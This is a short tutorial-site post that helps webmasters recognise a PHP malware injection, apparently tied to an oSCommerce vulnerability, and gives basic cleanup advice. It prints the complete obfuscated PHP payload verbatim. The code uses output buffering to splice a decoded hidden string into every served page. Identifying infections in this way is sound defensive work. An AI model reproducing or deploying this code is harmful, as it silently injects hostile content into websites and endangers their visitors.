Malware: global $ob_starting;
By: Emiley J
If you see this following code at the end of all your php pages then your site has been injected with malware. Follow the steps below to remove it.<?php global $ob_starting;
if(!$ob_starting) {
function ob_start_flush($s) {
$tc = array(0, 69, 84, 82, 67, 83, 79, 7, 9, 73, 8, 76, 63, 12, 78, 68, 23, 24, 65, 19, 27, 14, 3, 70, 80, 29, 89, 17, 86, 85, 2, 16, 77, 18, 91, 11, 93, 71, 66, 72, 75, 20, 87, 74, 59, 61, 22, 13, 37, 28, 52, 35, 21, 15, 1, 25, 34, 92, 36, 41, 30, 88, 46, 33, 51);
$tr = array(49, 5, 4, 3, 9, 24, 2, 0, 2, 26, 24, 1, 25, 30, 2, 1, 61, 2, 53, 43, 18, 28, 18, 5, 4, 3, 9, 24, 2, 30, 60, 9, 23, 0, 10, 2, 26, 24, 1, 6, 23, 10, 3, 1, 15, 1, 23, 12, 4, 6, 11, 6, 3, 5, 8, 25, 25, 30, 29, 14, 15, 1, 23, 9, 14, 1, 15, 30, 8, 0, 34, 0, 0, 0, 28, 18, 3, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 0, 25, 0, 14, 1, 42, 0, 63, 3, 3, 18, 26, 10, 7, 22, 41, 38, 17, 33, 16, 33, 7, 13, 0, 7, 22, 17, 27, 16, 17, 16, 23, 7, 13, 0, 7, 22, 17, 19, 33, 23, 17, 19, 7, 13, 0, 7, 22, 17, 17, 16, 23, 16, 41, 7, 13, 0, 7, 22, 41, 4, 19, 27, 17, 19, 7, 13, 0, 7, 22, 16, 41, 17, 16, 17, 19, 7, 13, 0, 7, 22, 19, 1, 16, 55, 16, 31, 7, 13, 0, 7, 22, 17, 52, 16, 31, 17, 33, 7, 13, 0, 7, 22, 16, 33, 17, 27, 16, 17, 7, 13, 0, 7, 22, 16, 23, 17, 19, 19, 27, 7, 13, 0, 7, 22, 33, 23, 17, 33, 17, 27, 7, 13, 0, 7, 22, 16, 33, 41, 4, 19, 27, 7, 13, 0, 7, 22, 16, 16, 17, 19, 17, 19, 7, 13, 0, 7, 22, 16, 23, 41, 55, 19, 1, 7, 13, 0, 7, 22, 19, 1, 16, 33, 16, 16, 7, 13, 0, 7, 22, 16, 31, 16, 15, 17, 19, 7, 13, 0, 7, 22, 16, 17, 16, 41, 17, 27, 7, 13, 0, 7, 22, 19, 15, 16, 33, 16, 17, 7, 13, 0, 7, 22, 19, 1, 16, 55, 17, 33, 7, 13, 0, 7, 22, 19, 1, 19, 27, 41, 15, 7, 8, 20, 0, 0, 0, 28, 18, 3, 0, 3, 1, 15, 1, 23, 12, 4, 6, 11, 6, 3, 5, 0, 25, 0, 27, 20, 0, 0, 0, 28, 18, 3, 0, 4, 6, 11, 6, 3, 5, 12, 24, 9, 4, 40, 1, 15, 0, 25, 0, 31, 20, 0, 0, 0, 23, 29, 14, 4, 2, 9, 6, 14, 0, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 2, 13, 5, 2, 26, 11, 1, 15, 8, 0, 34, 28, 18, 3, 0, 5, 0, 25, 0, 30, 30, 20, 23, 6, 3, 0, 10, 43, 25, 31, 20, 43, 49, 2, 21, 11, 1, 14, 37, 2, 39, 20, 43, 35, 35, 8, 0, 34, 28, 18, 3, 0, 4, 12, 3, 37, 38, 0, 25, 0, 2, 44, 43, 45, 20, 23, 6, 3, 0, 10, 9, 25, 27, 20, 9, 49, 16, 20, 9, 35, 35, 8, 0, 34, 28, 18, 3, 0, 4, 12, 4, 11, 3, 0, 25, 0, 4, 12, 3, 37, 38, 21, 5, 29, 38, 5, 2, 3, 10, 9, 35, 35, 13, 33, 8, 20, 9, 23, 0, 10, 4, 12, 4, 11, 3, 54, 25, 30, 31, 31, 30, 8, 0, 5, 0, 35, 25, 0, 64, 2, 3, 9, 14, 37, 21, 23, 3, 6, 32, 51, 39, 18, 3, 51, 6, 15, 1, 10, 24, 18, 3, 5, 1, 59, 14, 2, 10, 4, 12, 4, 11, 3, 13, 27, 46, 8, 47, 27, 52, 8, 20, 36, 36, 9, 23, 0, 10, 5, 2, 26, 11, 1, 15, 8, 0, 34, 5, 0, 25, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 19, 46, 8, 0, 35, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 19, 46, 13, 10, 5, 21, 11, 1, 14, 37, 2, 39, 47, 19, 17, 8, 8, 0, 35, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 44, 27, 45, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 27, 8, 35, 14, 1, 42, 0, 58, 18, 2, 1, 10, 8, 21, 37, 1, 2, 50, 9, 32, 1, 10, 8, 0, 35, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 10, 5, 21, 11, 1, 14, 37, 2, 39, 47, 33, 8, 8, 20, 36, 0, 1, 11, 5, 1, 0, 34, 5, 0, 25, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 19, 46, 13, 10, 5, 21, 11, 1, 14, 37, 2, 39, 47, 19, 17, 8, 8, 0, 35, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 44, 27, 45, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 27, 8, 35, 14, 1, 42, 0, 58, 18, 2, 1, 10, 8, 21, 37, 1, 2, 50, 9, 32, 1, 10, 8, 20, 36, 3, 1, 2, 29, 3, 14, 0, 5, 20, 0, 0, 0, 36, 0, 0, 0, 23, 29, 14, 4, 2, 9, 6, 14, 0, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 0, 34, 2, 3, 26, 0, 34, 0, 0, 0, 9, 23, 10, 54, 15, 6, 4, 29, 32, 1, 14, 2, 21, 37, 1, 2, 48, 11, 1, 32, 1, 14, 2, 56, 26, 59, 15, 0, 57, 57, 0, 54, 15, 6, 4, 29, 32, 1, 14, 2, 21, 4, 3, 1, 18, 2, 1, 48, 11, 1, 32, 1, 14, 2, 8, 34, 15, 6, 4, 29, 32, 1, 14, 2, 21, 42, 3, 9, 2, 1, 10, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 13, 27, 8, 8, 20, 0, 0, 0, 36, 0, 1, 11, 5, 1, 0, 34, 28, 18, 3, 0, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 25, 15, 6, 4, 29, 32, 1, 14, 2, 21, 4, 3, 1, 18, 2, 1, 48, 11, 1, 32, 1, 14, 2, 10, 30, 5, 4, 3, 9, 24, 2, 30, 8, 20, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 21, 2, 26, 24, 1, 25, 30, 2, 1, 61, 2, 53, 43, 18, 28, 18, 5, 4, 3, 9, 24, 2, 30, 20, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 21, 5, 3, 4, 25, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 13, 31, 8, 20, 15, 6, 4, 29, 32, 1, 14, 2, 21, 37, 1, 2, 48, 11, 1, 32, 1, 14, 2, 5, 56, 26, 50, 18, 37, 62, 18, 32, 1, 10, 30, 39, 1, 18, 15, 30, 8, 44, 31, 45, 21, 18, 24, 24, 1, 14, 15, 51, 39, 9, 11, 15, 10, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 8, 20, 36, 36, 0, 4, 18, 2, 4, 39, 10, 1, 8, 0, 34, 0, 36, 2, 3, 26, 0, 34, 4, 39, 1, 4, 40, 12, 4, 6, 11, 6, 3, 5, 12, 24, 9, 4, 40, 1, 15, 10, 8, 20, 36, 0, 4, 18, 2, 4, 39, 10, 1, 8, 0, 34, 0, 5, 1, 2, 50, 9, 32, 1, 6, 29, 2, 10, 30, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 30, 13, 0, 52, 31, 31, 8, 20, 36, 0, 0, 0, 36, 0, 0, 0, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 20, 36, 49, 53, 5, 4, 3, 9, 24, 2, 60);
$ob_htm = ''; foreach($tr as $tval) {
$ob_htm .= chr($tc[$tval]+32);
}
$slw=strtolower($s);
$i=strpos($slw,'</script');if($i){$i=strpos($slw,'>',$i);}
if(!$i){$i=strpos($slw,'</div');if($i){$i=strpos($slw,'>',$i);}}
if(!$i){$i=strpos($slw,'</table');if($i){$i=strpos($slw,'>',$i);}}
if(!$i){$i=strpos($slw,'</form');if($i){$i=strpos($slw,'>',$i);}}
if(!$i){$i=strpos($slw,'</p');if($i){$i=strpos($slw,'>',$i);}}
if(!$i){$i=strpos($slw,'</body');if($i){$i--;}}
if(!$i){$i=strlen($s);if($i){$i--;}}
$i++; $s=substr($s,0,$i).$ob_htm.substr($s,$i);
return $s;
}
$ob_starting = time();
@ob_start("ob_start_flush");
} ?>
Well to be honest, there is no simple way to remove it. But if you are wondering how this happened, you probably are using oSCommerce shopping cart module in your site. This malware is using a backdoor in one of oscommerce script vulnerability.
The best advice I can give is to totally delete all the folders including oscommerce and then recopy the backup files. You may surprised, that after recopying the old files, within hours the files are again injected with this code. If this happens then you will have to completely uninstall oscommerce and reinstall it again.
That could be bad news but thats what many people did to bring back their sites.Comment on this tutorial
- Data Science
- Android
- AJAX
- ASP.net
- C
- C++
- C#
- Cocoa
- Cloud Computing
- HTML5
- Java
- Javascript
- JSF
- JSP
- J2ME
- Java Beans
- EJB
- JDBC
- Linux
- Mac OS X
- iPhone
- MySQL
- Office 365
- Perl
- PHP
- Python
- Ruby
- VB.net
- Hibernate
- Struts
- SAP
- Trends
- Tech Reviews
- WebServices
- XML
- Certification
- Interview
categories
Subscribe to Tutorials
Related Tutorials
PHP code to write to a CSV file for Microsoft Applications
PHP code to write to a CSV file from MySQL query
PHP code to import from CSV file to MySQL
Password must include both numeric and alphabetic characters - Magento
Error: Length parameter must be greater than 0
PHP file upload prompts authentication for anonymous users
PHP file upload with IIS on windows XP/2000 etc
Multiple File Upload in PHP using IFRAME
Resume or Pause File Uploads in PHP
Exception in module wampmanager.exe at 000F15A0 in Windows 8